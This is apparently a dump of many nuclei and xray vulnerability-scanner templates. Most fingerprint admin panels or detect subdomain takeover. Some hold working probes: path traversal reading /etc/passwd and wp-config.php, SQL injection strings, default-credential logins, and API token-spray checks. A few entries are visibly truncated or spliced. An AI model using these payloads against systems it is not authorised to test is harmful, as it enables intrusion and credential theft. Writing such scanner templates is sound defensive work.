Redirect 5 | author: fuzz7j(https://github.com/fuzz7j) 6 | severity: medium 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /new/newhttps:/baidu.com 13 | expression: response.status == 302 && response.headers["location"] == "https:/baidu.com?" 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /cx-cloud-login-2.yaml: -------------------------------------------------------------------------------- 1 | id: cx-cloud-login2 2 | 3 | info: 4 | name: CX Cloud 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /cxcum/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 16 | matchers: 17 | - type: word 18 | words: 19 | - "CX Cloud" -------------------------------------------------------------------------------- /e-vulnerability/sangfor-vpn-supersession-rce.yaml: -------------------------------------------------------------------------------- 1 | id: sangfor-vpn-supersession-rce 2 | 3 | info: 4 | name: Sangfor VPN SuperSession TO RCE 5 | author: G-H-Z 6 | severity: Critical 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /por/login_auth.csp 14 | expression: response.status == 200 && response.body.bcontains(b'') && response.body.bcontains(b'') 15 | expression: r0() -------------------------------------------------------------------------------- /exposed-kafdrop.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-kafdrop 2 | 3 | info: 4 | name: Publicly exposed Kafdrop Interface 5 | author: dhiyaneshDk 6 | severity: low 7 | tags: exposure,misconfig,kafdrop 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - "Kafdrop: Broker List" 18 | - "Kafka Cluster Overview" 19 | condition: and 20 | -------------------------------------------------------------------------------- /fanruanoa2012-detect.yaml: -------------------------------------------------------------------------------- 1 | id: fanruanoa2012-detect 2 | 3 | info: 4 | name: FanRuanOA2012-detect 5 | author: YanYun 6 | severity: info 7 | tags: oa,java,fanruan,tech 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - 'down.download?FM_SYS_ID' -------------------------------------------------------------------------------- /find-config.xml copy.yaml: -------------------------------------------------------------------------------- 1 | id: Configuration_displayed 2 | info: 3 | name: Finds config for 4 | author: Clark 5 | severity: medium 6 | 7 | requests: 8 | - method: GET 9 | path: 10 | - "{{BaseURL}}/CaseManager/welcome/displayCmisConfig.jsp" 11 | 12 | matchers-condition: and 13 | matchers: 14 | 15 | - type: word 16 | words: 17 | - appSettings 18 | 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /hashicorp-vault-detect.yaml: -------------------------------------------------------------------------------- 1 | id: hashicorp-vault-detect 2 | 3 | info: 4 | name: HashiCorp Vault Detect 5 | author: Adam Crosser 6 | severity: info 7 | description: Detects HashiCorp Vault 8 | tags: tech,hashicorp 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/ui/vault/auth" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'Leostream' 17 | - 'https://www.leostream.com/perpetual-software-license-agreement/' 18 | -------------------------------------------------------------------------------- /openweather.yaml: -------------------------------------------------------------------------------- 1 | id: api-openweather 2 | 3 | info: 4 | name: OpenWeather API Test 5 | author: zzeitlin 6 | reference: https://openweathermap.org/current 7 | severity: info 8 | tags: token-spray,weather,openweather 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /pbootcms-detect.yaml: -------------------------------------------------------------------------------- 1 | id: pbootcms-detect 2 | 3 | info: 4 | name: PbootCMS Detect 5 | author: princechaddha 6 | severity: info 7 | tags: tech,pbootcms 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: regex 17 | regex: 18 | - 'PbootCMS(.*)' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /rstudio-detect.yaml: -------------------------------------------------------------------------------- 1 | id: rstudio-detect 2 | 3 | info: 4 | name: RStudio panel detector 5 | author: philippedelteil 6 | severity: info 7 | tags: panel,rstudio 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - 'RStudio' 18 | part: header 19 | - type: status 20 | status: 21 | - 302 22 | -------------------------------------------------------------------------------- /sap-hana-xsengine-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sap-hana-xsengine-panel 2 | 3 | info: 4 | name: SAP HANA XSEngine Admin Panel 5 | author: PR3R00T 6 | severity: info 7 | tags: panel,sap 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/sap/hana/xs/formLogin/login.html" 13 | redirects: true 14 | matchers: 15 | - type: word 16 | words: 17 | - "/sap/hana/xs/formLogin/images/sap.png" 18 | part: body 19 | -------------------------------------------------------------------------------- /saprouter-detect.yaml: -------------------------------------------------------------------------------- 1 | id: saprouter-detect 2 | 3 | info: 4 | name: SAPRouter Detection 5 | author: randomstr1ng 6 | severity: info 7 | tags: network,sap 8 | 9 | network: 10 | - inputs: 11 | - data: 57484f415245594f553f0a 12 | type: hex 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Hostname}}:3299" 17 | read-size: 1024 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "SAProuter" -------------------------------------------------------------------------------- /totemomail-smtp-detect.yaml: -------------------------------------------------------------------------------- 1 | id: totemomail-smtp-detect 2 | 3 | info: 4 | name: Totemomail SMTP Server Detect 5 | author: princechaddha 6 | severity: info 7 | tags: mail,smtp,network,totemomail 8 | 9 | network: 10 | - inputs: 11 | - data: "\r\n" 12 | read-size: 2048 13 | 14 | host: 15 | - "{{Hostname}}" 16 | - "{{Host}}:25" 17 | 18 | matchers: 19 | - type: word 20 | words: 21 | - "totemomail" 22 | -------------------------------------------------------------------------------- /a-fingerprinting/azure-kubernetes-service.yaml: -------------------------------------------------------------------------------- 1 | id: azure-kubernetes-service 2 | 3 | info: 4 | name: Detect Azure Kubernetes Service 5 | author: dhiyaneshDk 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /version 14 | expression: response.status == 200 && response.body.bcontains(b"Welcome to Azure Kubernetes Service (AKS)") 15 | expression: r0() -------------------------------------------------------------------------------- /apache/default-tomcat-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-tomcat-page 2 | 3 | info: 4 | name: Tomcat Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | tags: tech,tomcat 8 | reference: https://www.shodan.io/search?query=http.title%3A%22Apache+Tomcat%22 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | matchers: 15 | - type: word 16 | words: 17 | - "Apache Tomcat" 18 | part: body 19 | -------------------------------------------------------------------------------- /buttercms.yaml: -------------------------------------------------------------------------------- 1 | id: api-buttercms 2 | 3 | info: 4 | name: ButterCMS API Test 5 | author: zzeitlin 6 | reference: https://buttercms.com/docs/api/#introduction 7 | severity: info 8 | tags: token-spray,buttercms 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 401 19 | negative: true 20 | -------------------------------------------------------------------------------- /cve/2007/CNVD-200705-315.yaml: -------------------------------------------------------------------------------- 1 | id: CNNVD-200705-315 2 | 3 | info: 4 | name: Caucho Resin Information Disclosure 5 | author: whynot(https://github.com/notwhy) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /%20../web-inf/ 13 | expression: response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /") 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /cve/2018/CVE-2018-12613.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-12613 2 | 3 | info: 4 | name: PhpMyAdmin 4.8.1 Remote File Inclusion 5 | author: p0wd3r 6 | severity: critical 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd 13 | expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /cve/2019/CNVD-2019-16798.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2019-16798 2 | 3 | info: 4 | name: Coremail Information Disclosure 5 | author: cc_ci(https://github.com/cc8ci) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /mailsms/s?func=ADMIN:appState&dumpConfig=/ 13 | expression: response.status == 200 && response.body.bcontains(bytes("<object name=\"cm_md_db\">")) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /default-movable-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-movable-page 2 | 3 | info: 4 | name: Movable Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | metadata: 8 | shodan-query: title:"Welcome to Movable Type" 9 | tags: tech,movable 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | matchers: 16 | - type: word 17 | words: 18 | - "<title>Welcome to Movable Type" 19 | part: body 20 | -------------------------------------------------------------------------------- /django/django-admin-panel.yaml: -------------------------------------------------------------------------------- 1 | id: django-admin-panel 2 | 3 | info: 4 | name: Python Django Admin Panel 5 | author: pdteam 6 | severity: info 7 | tags: panel,django,python 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/login/?next=/admin/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Django administration" 17 | condition: and 18 | part: body 19 | -------------------------------------------------------------------------------- /entrust-identityguard.yaml: -------------------------------------------------------------------------------- 1 | id: identityguard-selfservice-entrust 2 | 3 | info: 4 | name: IdentityGuard Self-Service by Entrust 5 | author: nodauf 6 | severity: info 7 | tags: panel,identityguard 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers: 17 | - type: dsl 18 | dsl: 19 | - "contains(tolower(body),'identityguardselfservice')" -------------------------------------------------------------------------------- /expn-mail-detect.yaml: -------------------------------------------------------------------------------- 1 | id: expn-mail-detect 2 | 3 | info: 4 | name: EXPN Mail Server Detect 5 | author: r3dg33k 6 | severity: info 7 | tags: mail,expn,network 8 | 9 | network: 10 | - inputs: 11 | - data: "65686c6f20636865636b746c730a" 12 | type: hex 13 | read-size: 2048 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Host}}:25" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "250-EXPN" -------------------------------------------------------------------------------- /harbor-detect.yaml: -------------------------------------------------------------------------------- 1 | id: harbor-detect 2 | 3 | info: 4 | name: Harbor Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,harbor 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Harbor" 19 | part: body 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /pantheon-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: pantheon-takeover 2 | 3 | info: 4 | name: pantheon takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "The gods are wise, but do not know of the site which you seek." -------------------------------------------------------------------------------- /symfony/symfony-phpinfo.yaml: -------------------------------------------------------------------------------- 1 | id: symfony-phpinfo 2 | 3 | info: 4 | name: Check Symfony Phpinfo 5 | author: DoubleTake 6 | severity: low 7 | description: Check if /app_dev.php/_profiler/phpinfo exist 8 | tags: phpinfo,symfony 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/app_dev.php/_profiler/phpinfo" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - "PHP Version" -------------------------------------------------------------------------------- /uberflip-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: uberflip-takeover 2 | 3 | info: 4 | name: uberflip takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "Non-hub domain, The URL you've accessed does not provide a hub." -------------------------------------------------------------------------------- /wakatime.yaml: -------------------------------------------------------------------------------- 1 | id: api-wakatime 2 | 3 | info: 4 | name: WakaTime CI API Test 5 | author: zzeitlin 6 | reference: https://wakatime.com/developers 7 | severity: info 8 | tags: token-spray,wakatime 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 401 19 | negative: true 20 | -------------------------------------------------------------------------------- /wordpress/wordpress-duplicator-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-duplicator-path-traversal 2 | 3 | info: 4 | name: WordPress duplicator Path Traversal 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp—admin/admin—ajax.php?action=duplicator_download&file=/../wp-config.php" 12 | matchers: 13 | - type: word 14 | words: 15 | - "DB_NAME" 16 | part: body 17 | -------------------------------------------------------------------------------- /amazon-docker-config.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-docker-config 2 | 3 | info: 4 | name: Dockerrun AWS Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure,aws,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/Dockerrun.aws.json' 13 | matchers: 14 | - type: word 15 | words: 16 | - 'AWSEBDockerrunVersion' 17 | - 'containerDefinitions' 18 | condition: and 19 | -------------------------------------------------------------------------------- /brightcove-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: brightcove-takeover 2 | 3 | info: 4 | name: brightcove takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | 18 | - type: word 19 | words: 20 | - '

Error Code: 404

' -------------------------------------------------------------------------------- /cve/2017/CVE-2017-8917.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-8917 2 | 3 | info: 4 | name: Joomla SQL Injection 5 | author: unkown 6 | severity: critical 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) 13 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /d-default-pwd/mofi4500-default-password.yaml: -------------------------------------------------------------------------------- 1 | id: mofi4500-default-password 2 | 3 | info: 4 | name: MOFI4500-4GXeLTE-V2 Default Login 5 | author: pikpikcu 6 | severity: critical 7 | verified: false 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: POST 13 | path: /cgi-bin/luci/ 14 | body: username=root&password=admin 15 | expression: response.status == 200 && response.body.bcontains(b'MOFI4500 - General - LuCI') 16 | expression: r0() -------------------------------------------------------------------------------- /defectdojo-panel.yaml: -------------------------------------------------------------------------------- 1 | id: defectdojo-panel 2 | 3 | info: 4 | name: DefectDojo Exposure 5 | author: Adam Crosser 6 | severity: info 7 | metadata: 8 | shodan-query: html:"DefectDojo Logo" 9 | tags: panel,defectdojo 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/login?next=' 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "\"DefectDojoGerapy" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /google/google-staticmaps.yaml: -------------------------------------------------------------------------------- 1 | id: api-googlestaticmaps 2 | 3 | info: 4 | name: Google Static Maps API Test 5 | author: zzeitlin 6 | severity: info 7 | tags: token-spray,google,maps 8 | 9 | self-contained: true 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /laravel-debug-error.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-debug-error 2 | 3 | info: 4 | name: Larvel Debug Method Enabled 5 | author: dhiyaneshDK 6 | severity: medium 7 | tags: debug,laravel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Whoops! There was an error 19 | 20 | - type: status 21 | status: 22 | - 500 -------------------------------------------------------------------------------- /netlify-cms.yaml: -------------------------------------------------------------------------------- 1 | id: netlify-cms 2 | 3 | info: 4 | name: Netlify CMS Admin Panel 5 | author: sullo 6 | severity: info 7 | tags: panel,netlify 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/index.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: word 20 | words: 21 | - "Netlify CMS" 22 | part: body 23 | -------------------------------------------------------------------------------- /simplebooklet-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: simplebooklet-takeover 2 | 3 | info: 4 | name: simplebooklet takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - We can't find this XenForo' 20 | condition: and 21 | -------------------------------------------------------------------------------- /a-fingerprinting/landray-oa-panel.yaml: -------------------------------------------------------------------------------- 1 | id: landray-oa-panel 2 | 3 | info: 4 | name: Landray OA Panel Login 5 | author: YanYun 6 | severity: info 7 | verified: true 8 | description: app="Landray-OA系统" 9 | 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /login.jsp 15 | expression: response.status == 200 && response.body.bcontains(b'lui_login_input_username') && response.body.bcontains(b'lui_login_input_password') 16 | expression: r0() -------------------------------------------------------------------------------- /anima-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: anima-takeover 2 | 3 | info: 4 | name: Anima Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - "If this is your website and you've just created it, try refreshing in a minute" -------------------------------------------------------------------------------- /cve/2021/CNVD-2021-10543.yaml: -------------------------------------------------------------------------------- 1 | id: CNVD-2021-10543 2 | 3 | info: 4 | name: EEA Information Disclosure 5 | author: Search?=Null 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /authenticationserverservlet 13 | expression: response.status == 200 && "(.*?)".bmatches(response.body) && "(.*?)".bmatches(response.body) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /extract-firebase-database.yaml: -------------------------------------------------------------------------------- 1 | id: extract-firebase-database 2 | 3 | info: 4 | name: Firebase Database Extract Check 5 | author: rafaelwdornelas 6 | severity: info 7 | description: Extract Firebase Database 8 | tags: firebase 9 | 10 | requests: 11 | - raw: 12 | - | # REQUEST 2 13 | GET / HTTP/1.1 14 | Host: {{Hostname}} 15 | 16 | extractors: 17 | - type: regex 18 | regex: 19 | - "([a-z0-9.-]+.firebaseio.com)" 20 | -------------------------------------------------------------------------------- /kafka-center-login.yaml: -------------------------------------------------------------------------------- 1 | id: kafka-center-login 2 | 3 | info: 4 | name: Kafka Center Login 5 | author: dhiyaneshDK 6 | severity: info 7 | metadata: 8 | shodan-query: http.title:"Kafka Center" 9 | tags: panel,kafka 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | redirects: true 17 | max-redirects: 2 18 | matchers: 19 | - type: word 20 | words: 21 | - 'Kafka Center' 22 | -------------------------------------------------------------------------------- /sophos-mobile-panel-detection.yaml: -------------------------------------------------------------------------------- 1 | id: sophos-mobile-panel-detection 2 | 3 | info: 4 | name: Sophos Mobile Self Service Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/login.xhtml?faces-redirect=true' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "Switch to Sophos Mobile Admin" 19 | 20 | -------------------------------------------------------------------------------- /stripe.yaml: -------------------------------------------------------------------------------- 1 | id: api-stripe 2 | 3 | info: 4 | name: Stripe API Test 5 | author: zzeitlin 6 | reference: https://stripe.com/docs/api/authentication 7 | severity: info 8 | tags: token-spray,stripe 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.stripe.com/v1/charges" 14 | headers: 15 | Authorization: Basic {{base64(token + ':')}} 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /wildcard-postmessage.yaml: -------------------------------------------------------------------------------- 1 | id: wildcard-postmessage 2 | 3 | info: 4 | name: Wildcard postMessage detection 5 | author: pdteam 6 | severity: info 7 | reference: 8 | - https://jlajara.gitlab.io/web/2020/06/12/Dom_XSS_PostMessage.html 9 | tags: xss,postmessage 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | 16 | matchers: 17 | - type: regex 18 | regex: 19 | - postMessage\([a-zA-Z]+,["']\*["']\) 20 | -------------------------------------------------------------------------------- /aspnuke-openredirect.yaml: -------------------------------------------------------------------------------- 1 | id: aspnuke-openredirect 2 | 3 | info: 4 | name: ASP-Nuke Open Redirect 5 | author: pdteam 6 | severity: low 7 | tags: aspnuke,redirect 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569" 13 | 14 | matchers: 15 | - type: regex 16 | part: header 17 | regex: 18 | - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$' -------------------------------------------------------------------------------- /c-unauthorized/airflow-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: airflow-unauth 2 | 3 | info: 4 | name: Airflow Unauth 5 | author: pa55w0rd(www.pa55w0rd.online/) 6 | severity: high 7 | verified: true 8 | description: app="APACHE-Airflow" 9 | 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /admin/ 15 | expression: response.status == 200 && response.body.bcontains(b"Airflow - DAGs") 16 | expression: r0() 17 | 18 | -------------------------------------------------------------------------------- /clave-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: clave-login-panel 2 | 3 | info: 4 | name: Clave login panel 5 | author: __Fazal 6 | severity: info 7 | tags: panel,clave,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin.php' 13 | 14 | redirects: true 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | 21 | - type: word 22 | words: 23 | - "Clave" 24 | -------------------------------------------------------------------------------- /cve/2020/CVE-2020-5515.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5515 2 | 3 | info: 4 | name: Gila CMS 1.11.8 SQL Injection. 5 | author: PickledFish(https://github.com/PickledFish) 6 | severity: high 7 | 8 | set: 9 | r1: randomInt(200000000, 210000000) 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /admin/sql?query=SELECT%20md5({{r1}}) 15 | expression: response.body.bcontains(bytes(md5(string(r1)))) 16 | expression: r0() 17 | 18 | -------------------------------------------------------------------------------- /d-default-pwd/ns-icg-default-password.yaml: -------------------------------------------------------------------------------- 1 | id: ns-icg-default-password 2 | 3 | info: 4 | name: NS-ICG Default Password 5 | author: pikpikcu 6 | severity: high 7 | verified: true 8 | description: fofa "NS-ICG" 9 | 10 | rules: 11 | r0: 12 | request: 13 | method: POST 14 | path: /user/login/checkPermit 15 | body: usrname=ns25000&pass=ns25000 16 | expression: response.status == 200 && response.body.bcontains(b'{"agreed":true}') 17 | expression: r0() -------------------------------------------------------------------------------- /default-jetty-page.yaml: -------------------------------------------------------------------------------- 1 | id: default-jetty-page 2 | 3 | info: 4 | name: Jetty Default Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.shodan.io/search?query=http.title%3A%22Powered+By+Jetty%22 9 | tags: tech,jetty 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | matchers: 16 | - type: word 17 | words: 18 | - "Powered By Jetty" 19 | part: body 20 | -------------------------------------------------------------------------------- /druid-monitor.yaml: -------------------------------------------------------------------------------- 1 | id: druid-monitor 2 | 3 | info: 4 | name: Druid Monitor Unauthorized Access 5 | author: ohlinge 6 | severity: high 7 | tags: druid,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/druid/index.html" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Druid Stat Index' 19 | 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /e-vulnerability/natshell-arbitrary-file-read.yaml: -------------------------------------------------------------------------------- 1 | id: natshell-arbitrary-file-read 2 | 3 | info: 4 | name: Natshell Arbitrary File Read 5 | author: Print1n(http://print1n.top) 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /download.php?file=../../../../../etc/passwd 13 | expression: response.status == 200 && "(root|toor):[x*]:0:0:".bmatches(response.body) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /getresponse-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: getresponse-takeover 2 | 3 | info: 4 | name: getresponse takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'With GetResponse Landing Pages, lead generation has never been easier' -------------------------------------------------------------------------------- /ipstack.yaml: -------------------------------------------------------------------------------- 1 | id: api-ipstack 2 | 3 | info: 4 | name: IPStack API Test 5 | author: zzeitlin 6 | reference: https://ipstack.com/documentation 7 | severity: info 8 | tags: token-spray,ipstack 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | negative: true 19 | words: 20 | - 'invalid_access_key' 21 | -------------------------------------------------------------------------------- /java-rmi-detect.yaml: -------------------------------------------------------------------------------- 1 | id: java-rmi-detect 2 | 3 | info: 4 | name: Detect Java RMI Protocol 5 | author: F1tz 6 | severity: info 7 | tags: network,rmi,java 8 | 9 | network: 10 | - inputs: 11 | - data: "{{hex_decode('4a524d4900024b')}}" 12 | 13 | host: 14 | - "{{Hostname}}" 15 | read-size: 1024 16 | 17 | matchers: 18 | - type: regex 19 | part: raw 20 | regex: 21 | - "^N\\x00\\x0e(\\d{1,3}\\.){3}\\d{1,3}\\x00\\x00" 22 | -------------------------------------------------------------------------------- /livezilla-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: livezilla-login-panel 2 | 3 | info: 4 | name: Livezilla login detect 5 | author: __Fazal 6 | severity: info 7 | tags: panel,livezilla,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/mobile/index.php' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - 'LiveZilla' 23 | -------------------------------------------------------------------------------- /myucms-lfr.yaml: -------------------------------------------------------------------------------- 1 | id: myucms-lfr 2 | 3 | info: 4 | name: MyuCMS Local File Read 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://blog.csdn.net/yalecaltech/article/details/104908257 9 | tags: myucms,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "root:.*:0:0:" 19 | -------------------------------------------------------------------------------- /sharecenter-login.yaml: -------------------------------------------------------------------------------- 1 | id: sharecenter-login 2 | 3 | info: 4 | name: ShareCenter Login Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6892 9 | tags: panel,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | matchers: 16 | - type: word 17 | words: 18 | - "ShareCenter" 19 | - "Please Select Your Account" 20 | condition: and 21 | -------------------------------------------------------------------------------- /xxljob-admin-detect.yaml: -------------------------------------------------------------------------------- 1 | 